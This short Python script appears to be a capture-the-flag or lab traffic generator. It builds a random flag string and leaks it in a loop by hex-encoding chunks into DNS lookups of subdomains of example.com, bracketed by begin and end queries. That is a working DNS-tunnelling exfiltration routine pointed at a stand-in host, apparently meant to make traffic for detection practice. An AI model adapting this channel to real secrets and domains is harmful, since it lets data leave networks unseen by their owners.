#!/usr/bin/env python3

import dns.resolver
import os
import time
from binascii import hexlify


def main():
    DATA = f"IS_THIS_A_FLAG{os.urandom(16).hex()}"
    print(DATA)

    while True:
        try:
            dns.resolver.query("begin.example.com", "A")
        except:
            print("begin")

        time.sleep(0.5)
        
        for i in range(0, len(DATA), 16):
            try:
                dns.resolver.query(f"{hexlify(DATA[i:i+16].encode('ascii')).decode('ascii')}.example.com", "A")
                time.sleep(0.5)
            except:
                print(f"{hexlify(DATA[i:i+16].encode('ascii')).decode('ascii')}.example.com")

        try:
            dns.resolver.query("end.example.com", "A")
        except:
            print("end")

        time.sleep(15)

if __name__ == "__main__":
    main()
